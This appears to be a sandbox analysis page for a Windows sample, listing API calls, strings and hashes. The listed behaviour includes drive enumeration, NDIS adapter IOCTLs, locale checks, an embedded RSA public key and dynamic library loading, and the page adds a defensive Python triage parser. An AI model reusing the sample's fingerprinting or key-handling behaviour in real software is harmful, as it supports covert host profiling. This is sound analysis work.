• Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp
• Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp
• Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp
• Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp
Similarity
• API ID: _fprintf$_malloc_memset_strlen$AllocHeap_printf_strrchr
• String ID: %s%s%s$-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDLfprfltmOHTzR+m/YBEdzgxnHwXgNPal/ctcPxx2L3by8pqL9tpgSgEYEeIp+DMIOFvh0gY6/gt7hqXrairRK8XHrlfJJxucOxb54FThG8Apu+IsnhM3AKABV2b3P5PeloDtfi8E0TdADPHr0kgcvS7YUOm7Z/hoSXkJsrwXBOQIDAQAB-----END PUBL$Failed to decrypt.$Load Public Key Error!$load public key failed[
• API String ID: 83560530-3786281172
• Opcode ID: b3de269673a2d88b55db124ecf45c21d9fb690946513600749562b357f5ee6e2
• Instruction ID: b581232947f44ecb0e4fcd872eba601a2a8f6c184df0fc1422fdf5312542f7b8
• Opcode Fuzzy Hash: b3de269673a2d88b55db124ecf45c21d9fb690946513600749562b357f5ee6e2
                                                                                                                                                • Instruction Fuzzy Hash: C421E8F2D042183EDB1077B6AC83EEE6A9D8B01768F20467FF404E2193EDAC9E80415D
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

APIs
• GetLogicalDriveStringsW.KERNEL32(000003E8,?,00000000,00000206,00000000), ref: 0041E254
• lstrcmpiW.KERNEL32(?,A:\), ref: 0041E284
• lstrcmpiW.KERNEL32(?,B:\), ref: 0041E290
• QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041E2B8
• lstrlenW.KERNEL32(?), ref: 0041E2C6
• __wcsnicmp.LIBCMT ref: 0041E2D7
• lstrcpyW.KERNEL32 ref: 0041E2FF
• lstrcpyW.KERNEL32 ref: 0041E318
• lstrcatW.KERNEL32(?,00000000), ref: 0041E325
Strings
Memory Dump Source
• Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: lstrcmpilstrcpy$DeviceDriveLogicalQueryStrings__wcsnicmplstrcatlstrlen
• String ID: A:\$B:\
• API String ID: 950920757-1009255891
• Opcode ID: 74a82f8f36d1ce249537adfdb1a2663e2d96a3f99fbacc3361bbacbe819b6f20
• Instruction ID: 4808fe8f2782b36c54014319f215b8e2ba82bdd6c51a4d7a72c4565a4145858a
• Opcode Fuzzy Hash: 74a82f8f36d1ce249537adfdb1a2663e2d96a3f99fbacc3361bbacbe819b6f20
• Instruction Fuzzy Hash: 30312C7690030D9ADB60DFA2DC44AEE37BCAF44341F158026FD29D3150E734DA45CBAA
Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 004140D9
• CoInitializeEx.OLE32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004140F5
• CoCreateInstance.OLE32(004F86A4,00000000,00000001,004F85D4,?,00000000,00000000), ref: 0041411C
• CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0041418C
Strings
Memory Dump Source
• Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: BlanketCreateH_prologInitializeInstanceProxy
• String ID: Caption$SELECT Caption FROM Win32_SoundDevice$WQL
• API String ID: 1029552860-4200340773
• Opcode ID: 24bb946418d3bb363a1eefe25ce0528d0522c327a9cc52e5474e734d251cac45
• Instruction ID: 9b48da570da70a6b2613f76d511bf0da1c279102ff6286dca5f2ccf804418d14
• Opcode Fuzzy Hash: 24bb946418d3bb363a1eefe25ce0528d0522c327a9cc52e5474e734d251cac45
• Instruction Fuzzy Hash: 57514D71A01219EFCB10DF95C8889EEBB79FF85B54F20445AF511FB290C7789981CBA4
Uniqueness Score: -1.00%

APIs
• GetLastError.KERNEL32(?,?,?,?,004AC0F2,?,00000000), ref: 004B84B6
• _strncpy.LIBCMT ref: 004B84ED
• FormatMessageA.KERNEL32(00001000,00000000,?,00000000,?,000000FF,00000000,?,?,?,?,004AC0F2,?,00000000), ref: 004B8513
• __fprintf_l.LIBCMT ref: 004B8526
• _strrchr.LIBCMT ref: 004B8538
• _strrchr.LIBCMT ref: 004B8551
• GetLastError.KERNEL32(?,?,?,004AC0F2,?,00000000), ref: 004B8567
• SetLastError.KERNEL32(004AC0F2,?,?,?,004AC0F2,?,00000000), ref: 004B8577
Strings
Memory Dump Source
• Source File: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ErrorLast$_strrchr$FormatMessage__fprintf_l_strncpy
• String ID: Unknown error %d (%#x)
• API String ID: 3050962067-2414550090
• Opcode ID: 8b9691d4dbd458cf98c7d9d98f5b0e93ffb79a90828d18345cba8139ea26e077
• Instruction ID: fff0375afece4af9e06a990da95d0060fd5bdb52492a0a2e77ef9517b1601e9a
• Opcode Fuzzy Hash: 8b9691d4dbd458cf98c7d9d98f5b0e93ffb79a90828d18345cba8139ea26e077
• Instruction Fuzzy Hash: C521F0612452457EDA212A36AC45EBF7F8CDF8675EF15403FF40586282ED2E9940C27A
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID:
• String ID: ,name:$,value:$.\crypto\x509v3\v3_utl.c$FALSE$TRUE$YES$false$section:$true$yes
• API String ID: 0-4278224470
• Opcode ID: 831ca4bbbf7c0b37a35e143069e82e8213d7c8306a35b788627647294b8fcf30
• Instruction ID: 00e2d758610c92157541e325575411fe4c2d7a91dcd45af17fa2a0e1fb928e26
• Opcode Fuzzy Hash: 831ca4bbbf7c0b37a35e143069e82e8213d7c8306a35b788627647294b8fcf30
• Instruction Fuzzy Hash: C5315C62B001986BF764C92B99657332687D7C43A2F1DC177A6089B3C5EB688C4253A8
Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 004023F5
• LoadLibraryExW.KERNEL32(?,00000000,00000002), ref: 0040242D
• FindResourceW.KERNEL32(00000000,?,?), ref: 0040244F
• FreeLibrary.KERNEL32(?), ref: 00402543
  • Part of subcall function 004040F6: GetLastError.KERNEL32(004010A5), ref: 004040F6
Memory Dump Source
• Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Library$ErrorFindFreeH_prologLastLoadResource
• String ID:
• API String ID: 3353779945-0
• Opcode ID: 95f8fa3276995f74aba93b4a754303e46bf23b9ae9d710efc0eaed3eba7ff277
• Instruction ID: fa133fae183ef9fc174c46e36dc03bff0345d5a1b13c1964a3e9479f3909eaa2
• Opcode Fuzzy Hash: 95f8fa3276995f74aba93b4a754303e46bf23b9ae9d710efc0eaed3eba7ff277
• Instruction Fuzzy Hash: EA4186B1900119EBCB10DF64CE49A9E7BB8EB48355F50447BF505B22D2D7B88E41CBAD
Uniqueness Score: -1.00%

APIs
• CreateFileW.KERNEL32(?,00000000,00000003,00000000,00000003,00000000,00000000,#{ad498944-762f-11d0-8dcb-00c04fc3358c},?,7FFFFFFE,00000007,00000000,?), ref: 00414469
• DeviceIoControl.KERNEL32 ref: 00414494
• CloseHandle.KERNEL32(00000000), ref: 004144D1
Memory Dump Source
• Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp
• Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp
• Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp
• Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp
Similarity
• API ID: CloseControlCreateDeviceFileHandle
• String ID: #{ad498944-762f-11d0-8dcb-00c04fc3358c}$%02X$\\.\
• API String ID: 33631002-1280425602
• Opcode ID: 722c42ab405a57c2a772480af8c9ec014f40dddbed95defa20a6080d0ea5b0c7
• Instruction ID: b54b68fc39b668ebf3372720784ddcbe6a75180f3625ca0efe6e179d43352c24
• Opcode Fuzzy Hash: 722c42ab405a57c2a772480af8c9ec014f40dddbed95defa20a6080d0ea5b0c7
• Instruction Fuzzy Hash: 4A21F675A4011CBECB20AFA5DC84EEE7778EB80314F208167F925E71D0D6784A85CB65
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp
• Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp
• Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp
• Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp
Similarity
• API ID:
• String ID: 0$CURLOPT_SSL_VERIFYHOST no longer supports 1 as value!$identity
• API String ID: 0-4198463984
• Opcode ID: ff15d41181a33d2025563d0d7774b58692668852ed6e1cb0b3400d59ecf7c958
• Instruction ID: 8de3023caef2b36139e213c512e6e31edc526f7cf4c79fb9412f4cbf187cabed
• Opcode Fuzzy Hash: ff15d41181a33d2025563d0d7774b58692668852ed6e1cb0b3400d59ecf7c958
• Instruction Fuzzy Hash: 8DD26E74600206DFCB05CF6AC484AA93BA1FF2A344F24847BE91B8F351D739A946DF59
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp
• Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp
• Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp
• Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp
Similarity
• API ID: _memset
• String ID:
• API String ID: 2102423945-0
• Opcode ID: 56b9fbc62323cc0d91b456c8bb4ad1ca2aafccc112fde417de8ebcf7fe43d41f
• Instruction ID: 592b4e3213883bcb3bd9bd85f713344f7c0928d1a9f102dc46958a4852684957
• Opcode Fuzzy Hash: 56b9fbc62323cc0d91b456c8bb4ad1ca2aafccc112fde417de8ebcf7fe43d41f
• Instruction Fuzzy Hash: BBB1903660E7C18FC31EC62D8C8525A6F52AFE320479EC59CC8819F79BC46AE819D771
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp
• Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp
• Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp
• Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp
Similarity
• API ID: _memset
• String ID:
• API String ID: 2102423945-0
• Opcode ID: 032ff97260e70db766de6c2b47658c5d67f969f001b137187d31d07779f0e337
• Instruction ID: 9d70cd307622b6c42adf0fefb74e928220412501ed73f6808c9d8f0e30495972
• Opcode Fuzzy Hash: 032ff97260e70db766de6c2b47658c5d67f969f001b137187d31d07779f0e337
• Instruction Fuzzy Hash: 2941D772A0D3C15FC30A872A8C8165A7F52AFA3208B4E859CDC849F787C56AF854D7B1
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetThreadLocale.KERNEL32 ref: 0048E023
• GetLocaleInfoA.KERNEL32(00000000,00001004,?,00000007), ref: 0048E035
• GetACP.KERNEL32 ref: 0048E05E
Memory Dump Source
• Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp
• Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp
• Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp
• Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp
Similarity
• API ID: Locale$InfoThread
• String ID:
• API String ID: 4232894706-0
• Opcode ID: 646afb26f0c6f1ab0bdc8cef265b2432cef51ab5db699b3923b71377fc4fccb9
• Instruction ID: eab2dd2b2ec6968711c27c544392b5da0a6a3c615cdf34063db2ab4427336241
• Opcode Fuzzy Hash: 646afb26f0c6f1ab0bdc8cef265b2432cef51ab5db699b3923b71377fc4fccb9
• Instruction Fuzzy Hash: EEF0FC32E002389BDB25AF759C15AEF77E4BF05B04B0145ADD841F7350D6746D0987C8
Uniqueness

Uniqueness Score: -1.00%

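
Two entries in this section map directly onto signatures in the report header: the CreateFileW/DeviceIoControl/CloseHandle function (a device interface opened by class GUID, then driven with IOCTLs) and the GetThreadLocale/GetLocaleInfoA/GetACP function. The Python below is an added triage helper, not part of the Joe Sandbox report or of the analysed sample. It parses entries written in this listing format, decodes the CreateFileW parameters and the `#{...}` GUID, and emits findings. The GUID table is hand-written and holds only the one GUID on this page, which is GUID_NDIS_LAN_CLASS from ntddndis.h; the embedded sample text is a condensed, constructed copy of the two entries; the "adapter address" reading is the script's own labelled inference, not something the report states.

```python
"""Triage helper for Joe Sandbox function summaries (added example, not
part of the report): parse "APIs"/"Similarity" fields, decode CreateFileW
parameters and device-interface GUIDs, and emit signature-style findings."""
import re
from dataclasses import dataclass, field

# Hand-written table; only the GUID seen in this report (GUID_NDIS_LAN_CLASS).
KNOWN_INTERFACE_GUIDS = {
    "ad498944-762f-11d0-8dcb-00c04fc3358c": "GUID_NDIS_LAN_CLASS (NDIS network adapter)",
}
LCTYPES = {0x1004: "LOCALE_IDEFAULTANSICODEPAGE"}          # winnls.h
DISPOSITIONS = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
                4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
SHARE_BITS = ((1, "FILE_SHARE_READ"), (2, "FILE_SHARE_WRITE"), (4, "FILE_SHARE_DELETE"))

# "• Name.MODULE(arg,arg,...), ref: ADDR"  or  "• Name.MODULE ref: ADDR"
API_LINE = re.compile(r"^•\s*(?P<name>\w+)\.(?P<module>\w+)"
                      r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")
GUID_RE = re.compile(r"#\{([0-9a-fA-F-]{36})\}")

# Constructed sample in the report's format (condensed copies of two entries).
SAMPLE = """\
APIs
• CreateFileW.KERNEL32(?,00000000,00000003,00000000,00000003,00000000,00000000,#{ad498944-762f-11d0-8dcb-00c04fc3358c},?,7FFFFFFE,00000007,00000000,?), ref: 00414469
• DeviceIoControl.KERNEL32 ref: 00414494
• CloseHandle.KERNEL32(00000000), ref: 004144D1
• String ID: #{ad498944-762f-11d0-8dcb-00c04fc3358c}$%02X$\\\\.\\
• Opcode ID: 722c42ab405a57c2a772480af8c9ec014f40dddbed95defa20a6080d0ea5b0c7

APIs
• GetThreadLocale.KERNEL32 ref: 0048E023
• GetLocaleInfoA.KERNEL32(00000000,00001004,?,00000007), ref: 0048E035
• GetACP.KERNEL32 ref: 0048E05E
• String ID:
• Opcode ID: 646afb26f0c6f1ab0bdc8cef265b2432cef51ab5db699b3923b71377fc4fccb9
"""


@dataclass
class FunctionEntry:
    apis: list = field(default_factory=list)    # (name, module, [args], ref)
    strings: list = field(default_factory=list)
    opcode_id: str = ""

    def api(self, name):
        return next((a for a in self.apis if a[0] == name), None)


def parse_entries(text):
    """Split blank-line separated entries and collect the fields we use."""
    entries = []
    for chunk in re.split(r"\n\s*\n", text.strip()):
        entry = FunctionEntry()
        for line in (l.strip() for l in chunk.splitlines()):
            m = API_LINE.match(line)
            if m:
                args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
                entry.apis.append((m["name"], m["module"], args, m["ref"]))
            elif line.startswith("• String ID:"):      # strings are '$'-joined
                entry.strings = [s for s in line.split(":", 1)[1].strip().split("$") if s]
            elif line.startswith("• Opcode ID:"):
                entry.opcode_id = line.split(":", 1)[1].strip()
        if entry.apis:
            entries.append(entry)
    return entries


def decode_createfile(args):
    """Name the CreateFileW parameters that matter for a device open. The
    sandbox prints stack slots past the seven real parameters, so only
    indices 1 (access), 2 (share mode) and 4 (disposition) are read."""
    access, share, disp = (int(args[i], 16) for i in (1, 2, 4))
    return {
        "access": "0 (no access rights; enough for FILE_ANY_ACCESS IOCTLs)" if access == 0 else hex(access),
        "share": "|".join(n for bit, n in SHARE_BITS if share & bit) or "0",
        "disposition": DISPOSITIONS.get(disp, hex(disp)),
    }


def triage(entry):
    """Return human-readable findings for one function entry."""
    findings = []
    cf, ioctl = entry.api("CreateFileW"), entry.api("DeviceIoControl")
    if cf and ioctl:
        guids = [g.lower() for a in cf[2] for g in GUID_RE.findall(a)]
        target = ", ".join(KNOWN_INTERFACE_GUIDS.get(g, g) for g in guids) or "unnamed device"
        p = decode_createfile(cf[2])
        findings.append(f"device-driver communication: CreateFileW on {target} "
                        f"(access={p['access']}, share={p['share']}, {p['disposition']}), "
                        f"then DeviceIoControl at {ioctl[3]}")
        if "%02X" in entry.strings and "\\\\.\\" in entry.strings:
            # Inference, not stated by the report: hex-formatting bytes read from
            # an NDIS adapter interface is how adapter addresses become a host ID.
            findings.append("formats bytes as uppercase hex after the IOCTL "
                            "(consistent with reading an adapter address; inference)")
    loc = entry.api("GetLocaleInfoA")
    if loc and entry.api("GetACP"):
        lctype = int(loc[2][1], 16) if len(loc[2]) > 1 else None
        name = LCTYPES.get(lctype, hex(lctype) if lctype is not None else "?")
        # Caveat: this triple also appears in compiler run-time start-up code
        # (ANSI code page detection), so alone it is weak evidence of geofencing.
        findings.append(f"locale query: GetLocaleInfoA({name}) with GetACP fallback; "
                        "weak evidence on its own, also seen in run-time initialisation")
    return findings


def triage_report(text):
    """Map each entry (first 12 hex digits of its Opcode ID) to its findings."""
    return {e.opcode_id[:12]: triage(e) for e in parse_entries(text)}


if __name__ == "__main__":
    for opcode, findings in triage_report(SAMPLE).items():
        print(opcode)
        for finding in findings:
            print("  -", finding)
```

Feed it the saved text of this section instead of `SAMPLE` to run it over every entry; it only recognises the two patterns above, so other entries simply produce no findings, and anything it labels an inference still needs confirmation from the IOCTL code and OID passed to DeviceIoControl, which this report does not show.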
Memory Dump Source
• Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp
• Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp
• Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp
• Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp
Similarity
• API ID: _memset
• String ID: __@>
• API String ID: 2102423945-3839032267
• Opcode ID: 8ee65bd35f2f958ac132f4dca78d8ed6305433c17ba35f2a1f822496b243ca8d
• Instruction ID: c798ab61d422f3b7bc59d3989ac6eb9c7c3a8d32af1db760fb7bef9857c365dc
• Opcode Fuzzy Hash: 8ee65bd35f2f958ac132f4dca78d8ed6305433c17ba35f2a1f822496b243ca8d
• Instruction Fuzzy Hash: 5322847BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp
• Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp
• Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp
• Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp
Similarity
• API ID:
• String ID: GetProcAddress$LoadLibraryExA$aryExA
• API String ID: 0-2920269711
• Opcode ID: 2f3a92986eaf651c49b717ac3ce8e463752147d74b3af29585d1c9e67a8752a7
• Instruction ID: 18d293642061ca8d49c1ce2eb18f573906c8b4bc9ea97ffec93426ba86c31c4c
• Opcode Fuzzy Hash: 2f3a92986eaf651c49b717ac3ce8e463752147d74b3af29585d1c9e67a8752a7
• Instruction Fuzzy Hash: A871A370D04288DFDB05CFD8C594BDEBBF2AF59308F148189D4446B386C3BA6A49CBA5
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID:
• String ID: GetProcAddress$LoadLibraryExA$aryExA
• API String ID: 0-2920269711
Uniqueness
Uniqueness Score: -1.00%
Strings
Memory Dump Source
• Source File: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID:
• String ID: GetProcAddress$LoadLibraryExA$aryExA
• API String ID: 0-2920269711
Uniqueness
Uniqueness Score: -1.00%
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: _memset
• String ID: .\crypto\rsa\rsa_oaep.c
• API String ID: 2102423945-3887057465
Uniqueness
Uniqueness Score: -1.00%
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: _memset
• String ID: .\crypto\rsa\rsa_pk1.c
• API String ID: 2102423945-3529532903
Uniqueness
Uniqueness Score: -1.00%
APIs
Memory Dump Source
• Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: _memset
• String ID:
• API String ID: 2102423945-0
Uniqueness
Uniqueness Score: -1.00%
Strings
Memory Dump Source
• Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID:
• String ID: .\crypto\asn1\a_object.c$?C
• API String ID: 0-1451553936
Uniqueness
Uniqueness Score: -1.00%
Strings
Memory Dump Source
• Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID:
• String ID: .\crypto\rand\md_rand.c$gfff
• API String ID: 0-1559015272
Uniqueness
Uniqueness Score: -1.00%
APIs
Memory Dump Source
• Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _memset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2102423945-0
                                                                                                                                                • Opcode ID: 852196201063a9cdc12b9fb41cc865ae988f580035d4ac42423f555c8e0a6b46
                                                                                                                                                • Instruction ID: 9e8b7f37256e0f9baa3c835dde5d7bcdbf16344d12c0ccb238e768a533a20193
                                                                                                                                                • Opcode Fuzzy Hash: 852196201063a9cdc12b9fb41cc865ae988f580035d4ac42423f555c8e0a6b46
                                                                                                                                                • Instruction Fuzzy Hash: 5B22747BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: sSG
                                                                                                                                                • API String ID: 0-3503871423
                                                                                                                                                • Opcode ID: 826a47908c4361b131341d4006f1c5140dcc430aa24daf52bd52b27e36d88eff
                                                                                                                                                • Instruction ID: 2fff07c29cc1aa7a0a15543c6602a8e284411a23f4b51bb834207ccb4d0f3bd9
                                                                                                                                                • Opcode Fuzzy Hash: 826a47908c4361b131341d4006f1c5140dcc430aa24daf52bd52b27e36d88eff
                                                                                                                                                • Instruction Fuzzy Hash: 49311271A083419BC304DF19C984A2FFBE5ABC8314F448A2EF89997351D735EA098B86
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 4d6c9128871f1856d39bcc1edb13b036d26e4810c246a284f6b4713b95345826
                                                                                                                                                • Instruction ID: 683e599a53e5d7d9f7ed853b8deeb98a2236d766f4405d893a1d1bbcf9869a1c
                                                                                                                                                • Opcode Fuzzy Hash: 4d6c9128871f1856d39bcc1edb13b036d26e4810c246a284f6b4713b95345826
                                                                                                                                                • Instruction Fuzzy Hash: FF2273735417044BE318CE2ECC815C2B3E3AFD822475F857EC926CB796EEB9A6174548
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
